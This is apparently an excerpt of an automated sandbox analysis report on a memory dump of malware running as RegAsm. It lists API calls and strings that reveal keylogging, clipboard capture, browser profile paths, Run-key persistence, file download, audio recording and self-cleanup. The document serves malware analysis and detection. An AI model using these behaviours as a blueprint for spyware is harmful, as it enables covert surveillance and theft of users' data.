                                • API String ID: 3213639722-2276729525
                                APIs
                                  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                • __Init_thread_footer.LIBCMT ref: 0040B797
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: Init_thread_footer__onexit
                                • String ID: [End of clipboard]$[Text copied to clipboard]
                                • API String ID: 1881088180-3686566968
                                APIs
                                • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: ACP$OCP
                                • API String ID: 0-711371036
                                APIs
                                • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                                Strings
                                • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: LocalTime
                                • String ID: KeepAlive | Enabled | Timeout:
                                • API String ID: 481472006-1507639952
                                APIs
                                • Sleep.KERNEL32 ref: 00416640
                                • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: DownloadFileSleep
                                • String ID: !D@
                                • API String ID: 1931167962-604454484
                                APIs
                                • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: LocalTime
                                • String ID: | $%02i:%02i:%02i:%03i
                                • API String ID: 481472006-2430845779
                                APIs
                                • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: alarm.wav$hYG
                                • API String ID: 1174141254-2782910960
                                APIs
                                  • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                  • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • CloseHandle.KERNEL32(?), ref: 0040B0B4
                                • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                • String ID: Online Keylogger Stopped
                                • API String ID: 1623830855-1496645233
                                APIs
                                • waveInPrepareHeader.WINMM(?,00000020,?), ref: 00401849
                                • waveInAddBuffer.WINMM(?,00000020), ref: 0040185F
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: wave$BufferHeaderPrepare
                                • String ID: XMG
                                • API String ID: 2315374483-813777761
                                APIs
                                • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: LocaleValid
                                • String ID: IsValidLocaleName$JD
                                • API String ID: 1901932003-2234456777
                                APIs
                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C4F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                • API String ID: 1174141254-4188645398
                                APIs
                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C559
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                • API String ID: 1174141254-2800177040
                                APIs
                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5BC
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: AppData$\Opera Software\Opera Stable\
                                • API String ID: 1174141254-1629609700
                                APIs
                                • GetKeyState.USER32(00000011), ref: 0040B64B
                                  • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
                                  • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                  • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32 ref: 0040A429
                                  • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                                  • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
                                  • Part of subcall function 0040A3E0: ToUnicodeEx.USER32 ref: 0040A461
                                  • Part of subcall function 0040A3E0: ToUnicodeEx.USER32 ref: 0040A4C1
                                  • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                • String ID: [AltL]$[AltR]
                                • API String ID: 2738857842-2658077756
                                APIs
                                • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: uD
                                • API String ID: 0-2547262877
                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell
                                • String ID: !D@$open
                                • API String ID: 587946157-1586967515
                                APIs
                                • GetKeyState.USER32(00000012), ref: 0040B6A5
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: State
                                • String ID: [CtrlL]$[CtrlR]
                                • API String ID: 1649606143-2446555240
                                APIs
                                  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                • __Init_thread_footer.LIBCMT ref: 00410F29
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Init_thread_footer__onexit
                                • String ID: ,kG$0kG
                                • API String ID: 1881088180-2015055088
                                APIs
                                Strings
                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteOpenValue
                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                • API String ID: 2654517830-1051519024
                                APIs
                                • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876
                                • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteDirectoryFileRemove
                                • String ID: pth_unenc
                                • API String ID: 3325800564-4028850238
                                APIs
                                • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                • WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ObjectProcessSingleTerminateWait
                                • String ID: pth_unenc
                                • API String ID: 1872346434-4028850238
                                APIs
                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                                • GetLastError.KERNEL32 ref: 00440D35
                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide$ErrorLast
                                • String ID:
                                • API String ID: 1717984340-0
                                APIs
                                • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                                • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                                • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C7A
                                • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastRead
                                • String ID:
                                • API String ID: 4100373531-0